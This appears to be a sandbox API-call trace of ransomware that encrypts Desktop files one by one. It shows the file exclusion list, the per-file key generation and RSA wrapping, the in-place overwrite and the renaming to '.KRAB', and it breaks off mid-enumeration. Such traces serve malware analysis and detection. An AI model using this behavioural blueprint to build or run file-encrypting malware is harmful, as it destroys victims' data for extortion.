[0088.211] lstrcmpiW (lpString1="uD7dua.pptx", lpString2="bootsect.bak") returned 1 [0088.211] lstrcmpiW (lpString1="uD7dua.pptx", lpString2="boot.ini") returned 1 [0088.211] lstrcmpiW (lpString1="uD7dua.pptx", lpString2="ntuser.dat.log") returned 1 [0088.211] lstrcmpiW (lpString1="uD7dua.pptx", lpString2="thumbs.db") returned 1 [0088.212] lstrcmpiW (lpString1="uD7dua.pptx", lpString2="KRAB-DECRYPT.html") returned 1 [0088.212] lstrcmpiW (lpString1="uD7dua.pptx", lpString2="KRAB-DECRYPT.txt") returned 1 [0088.212] lstrcmpiW (lpString1="uD7dua.pptx", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.212] lstrcmpiW (lpString1="uD7dua.pptx", lpString2="ntldr") returned 1 [0088.212] lstrcmpiW (lpString1="uD7dua.pptx", lpString2="NTDETECT.COM") returned 1 [0088.212] lstrcmpiW (lpString1="uD7dua.pptx", lpString2="Bootfont.bin") returned 1 [0088.212] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.212] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011700) returned 1 [0088.214] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.214] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.214] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.215] CryptGenRandom (in: hProv=0x1011700, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0088.215] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0088.215] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.215] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0088.227] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.228] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.228] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.228] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0088.228] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0088.228] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.228] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10112c0) returned 1 [0088.231] CryptImportKey (in: hProv=0x10112c0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10235f8) returned 1 [0088.232] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.232] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.232] GetLastError () returned 0x0 [0088.232] CryptDestroyKey (hKey=0x10235f8) returned 1 [0088.232] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0088.232] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10110a0) returned 1 [0088.236] CryptImportKey (in: hProv=0x10110a0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10231f8) returned 1 [0088.236] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.236] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.236] GetLastError () returned 0x0 [0088.236] CryptDestroyKey (hKey=0x10231f8) returned 1 [0088.236] CryptReleaseContext (hProv=0x10110a0, dwFlags=0x0) returned 1 [0088.236] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\uD7dua.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\ud7dua.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.237] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0088.237] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0088.238] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0xcafe, lpOverlapped=0x0) returned 1 [0088.253] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff3502, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.253] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xcafe, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0xcafe, lpOverlapped=0x0) returned 1 [0088.253] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0088.253] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.257] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.258] CloseHandle (hObject=0x434) returned 1 [0088.258] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.259] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\uD7dua.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\ud7dua.pptx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\uD7dua.pptx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\ud7dua.pptx.krab")) returned 1 [0088.259] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.260] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0088.260] lstrcmpW (lpString1="v8pIBb15H_kETsL.swf", lpString2=".") returned 1 [0088.260] lstrcmpW (lpString1="v8pIBb15H_kETsL.swf", lpString2="..") returned 1 [0088.260] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="v8pIBb15H_kETsL.swf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\v8pIBb15H_kETsL.swf") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\v8pIBb15H_kETsL.swf" [0088.260] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0088.260] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\v8pIBb15H_kETsL.swf.KRAB") returned 54 [0088.260] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\v8pIBb15H_kETsL.swf") returned 49 [0088.260] lstrlenW (lpString=".swf") returned 4 [0088.260] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.261] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".swf ") returned 5 [0088.261] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.261] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\v8pIBb15H_kETsL.swf") returned 49 [0088.262] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\v8pIBb15H_kETsL.swf") returned 49 [0088.262] lstrcmpiW (lpString1="v8pIBb15H_kETsL.swf", lpString2="desktop.ini") returned 1 [0088.262] lstrcmpiW (lpString1="v8pIBb15H_kETsL.swf", lpString2="autorun.inf") returned 1 [0088.262] lstrcmpiW (lpString1="v8pIBb15H_kETsL.swf", lpString2="ntuser.dat") returned 1 [0088.262] lstrcmpiW (lpString1="v8pIBb15H_kETsL.swf", lpString2="iconcache.db") returned 1 [0088.262] lstrcmpiW (lpString1="v8pIBb15H_kETsL.swf", lpString2="bootsect.bak") returned 1 [0088.262] lstrcmpiW (lpString1="v8pIBb15H_kETsL.swf", lpString2="boot.ini") returned 1 [0088.262] lstrcmpiW (lpString1="v8pIBb15H_kETsL.swf", lpString2="ntuser.dat.log") returned 1 [0088.262] lstrcmpiW (lpString1="v8pIBb15H_kETsL.swf", lpString2="thumbs.db") returned 1 [0088.262] lstrcmpiW (lpString1="v8pIBb15H_kETsL.swf", lpString2="KRAB-DECRYPT.html") returned 1 [0088.262] lstrcmpiW (lpString1="v8pIBb15H_kETsL.swf", lpString2="KRAB-DECRYPT.txt") returned 1 [0088.262] lstrcmpiW (lpString1="v8pIBb15H_kETsL.swf", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.262] lstrcmpiW (lpString1="v8pIBb15H_kETsL.swf", lpString2="ntldr") returned 1 [0088.262] lstrcmpiW (lpString1="v8pIBb15H_kETsL.swf", lpString2="NTDETECT.COM") returned 1 [0088.262] lstrcmpiW (lpString1="v8pIBb15H_kETsL.swf", lpString2="Bootfont.bin") returned 1 [0088.262] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.263] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011238) returned 1 [0088.264] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.265] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.269] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.269] CryptGenRandom (in: hProv=0x1011238, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0088.269] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0088.269] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.269] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10110a0) returned 1 [0088.271] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.271] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.272] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.272] CryptGenRandom (in: hProv=0x10110a0, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0088.272] CryptReleaseContext (hProv=0x10110a0, dwFlags=0x0) returned 1 [0088.272] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.272] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010c60) returned 1 [0088.273] CryptImportKey (in: hProv=0x1010c60, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1022ff8) returned 1 [0088.274] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.274] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.274] GetLastError () returned 0x0 [0088.274] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0088.274] CryptReleaseContext (hProv=0x1010c60, dwFlags=0x0) returned 1 [0088.274] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011238) returned 1 [0088.275] CryptImportKey (in: hProv=0x1011238, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1023378) returned 1 [0088.276] CryptGetKeyParam (in: hKey=0x1023378, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.276] CryptEncrypt (in: hKey=0x1023378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.276] GetLastError () returned 0x0 [0088.276] CryptDestroyKey (hKey=0x1023378) returned 1 [0088.276] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0088.276] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\v8pIBb15H_kETsL.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\v8pibb15h_ketsl.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.277] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0088.277] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0088.277] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x101f1, lpOverlapped=0x0) returned 1 [0088.292] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffefe0f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.292] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x101f1, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x101f1, lpOverlapped=0x0) returned 1 [0088.292] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0088.292] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.297] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.297] CloseHandle (hObject=0x434) returned 1 [0088.297] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.298] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\v8pIBb15H_kETsL.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\v8pibb15h_ketsl.swf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\v8pIBb15H_kETsL.swf.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\v8pibb15h_ketsl.swf.krab")) returned 1 [0088.298] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.299] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0088.299] lstrcmpW (lpString1="xH62K.bmp", lpString2=".") returned 1 [0088.299] lstrcmpW (lpString1="xH62K.bmp", lpString2="..") returned 1 [0088.299] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="xH62K.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\xH62K.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\xH62K.bmp" [0088.299] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0088.299] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\xH62K.bmp.KRAB") returned 44 [0088.299] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\xH62K.bmp") returned 39 [0088.299] lstrlenW (lpString=".bmp") returned 4 [0088.299] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.300] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".bmp ") returned 5 [0088.300] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.300] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\xH62K.bmp") returned 39 [0088.300] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\xH62K.bmp") returned 39 [0088.300] lstrcmpiW (lpString1="xH62K.bmp", lpString2="desktop.ini") returned 1 [0088.300] lstrcmpiW (lpString1="xH62K.bmp", lpString2="autorun.inf") returned 1 [0088.300] lstrcmpiW (lpString1="xH62K.bmp", lpString2="ntuser.dat") returned 1 [0088.300] lstrcmpiW (lpString1="xH62K.bmp", lpString2="iconcache.db") returned 1 [0088.300] lstrcmpiW (lpString1="xH62K.bmp", lpString2="bootsect.bak") returned 1 [0088.300] lstrcmpiW (lpString1="xH62K.bmp", lpString2="boot.ini") returned 1 [0088.300] lstrcmpiW (lpString1="xH62K.bmp", lpString2="ntuser.dat.log") returned 1 [0088.300] lstrcmpiW (lpString1="xH62K.bmp", lpString2="thumbs.db") returned 1 [0088.300] lstrcmpiW (lpString1="xH62K.bmp", lpString2="KRAB-DECRYPT.html") returned 1 [0088.301] lstrcmpiW (lpString1="xH62K.bmp", lpString2="KRAB-DECRYPT.txt") returned 1 [0088.301] lstrcmpiW (lpString1="xH62K.bmp", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.301] lstrcmpiW (lpString1="xH62K.bmp", lpString2="ntldr") returned 1 [0088.301] lstrcmpiW (lpString1="xH62K.bmp", lpString2="NTDETECT.COM") returned 1 [0088.301] lstrcmpiW (lpString1="xH62K.bmp", lpString2="Bootfont.bin") returned 1 [0088.301] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.301] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0088.303] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.303] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.303] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.303] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0088.303] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0088.303] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.304] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010b50) returned 1 [0088.305] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.306] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.306] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.306] CryptGenRandom (in: hProv=0x1010b50, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0088.306] CryptReleaseContext (hProv=0x1010b50, dwFlags=0x0) returned 1 [0088.306] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.306] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010e80) returned 1 [0088.308] CryptImportKey (in: hProv=0x1010e80, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1023038) returned 1 [0088.308] CryptGetKeyParam (in: hKey=0x1023038, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.308] CryptEncrypt (in: hKey=0x1023038, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.308] GetLastError () returned 0x0 [0088.308] CryptDestroyKey (hKey=0x1023038) returned 1 [0088.308] CryptReleaseContext (hProv=0x1010e80, dwFlags=0x0) returned 1 [0088.308] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010bd8) returned 1 [0088.310] CryptImportKey (in: hProv=0x1010bd8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1023338) returned 1 [0088.310] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.310] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.310] GetLastError () returned 0x0 [0088.310] CryptDestroyKey (hKey=0x1023338) returned 1 [0088.311] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0088.311] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\xH62K.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\xh62k.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.311] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0088.314] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0088.315] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0xf5a1, lpOverlapped=0x0) returned 1 [0088.329] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff0a5f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.329] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xf5a1, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0xf5a1, lpOverlapped=0x0) returned 1 [0088.329] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0088.330] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.335] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.336] CloseHandle (hObject=0x434) returned 1 [0088.336] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.336] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\xH62K.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\xh62k.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\xH62K.bmp.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\xh62k.bmp.krab")) returned 1 [0088.337] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.337] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0088.337] lstrcmpW (lpString1="YjcuW46gUxYRn7.ppt", lpString2=".") returned 1 [0088.337] lstrcmpW (lpString1="YjcuW46gUxYRn7.ppt", lpString2="..") returned 1 [0088.337] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="YjcuW46gUxYRn7.ppt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\YjcuW46gUxYRn7.ppt") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\YjcuW46gUxYRn7.ppt" [0088.337] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0088.338] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\YjcuW46gUxYRn7.ppt.KRAB") returned 53 [0088.338] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\YjcuW46gUxYRn7.ppt") returned 48 [0088.338] lstrlenW (lpString=".ppt") returned 4 [0088.338] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.338] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ppt ") returned 5 [0088.338] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.339] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\YjcuW46gUxYRn7.ppt") returned 48 [0088.339] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\YjcuW46gUxYRn7.ppt") returned 48 [0088.341] lstrcmpiW (lpString1="YjcuW46gUxYRn7.ppt", lpString2="desktop.ini") returned 1 [0088.341] lstrcmpiW (lpString1="YjcuW46gUxYRn7.ppt", lpString2="autorun.inf") returned 1 [0088.341] lstrcmpiW (lpString1="YjcuW46gUxYRn7.ppt", lpString2="ntuser.dat") returned 1 [0088.341] lstrcmpiW (lpString1="YjcuW46gUxYRn7.ppt", lpString2="iconcache.db") returned 1 [0088.341] lstrcmpiW (lpString1="YjcuW46gUxYRn7.ppt", lpString2="bootsect.bak") returned 1 [0088.341] lstrcmpiW (lpString1="YjcuW46gUxYRn7.ppt", lpString2="boot.ini") returned 1 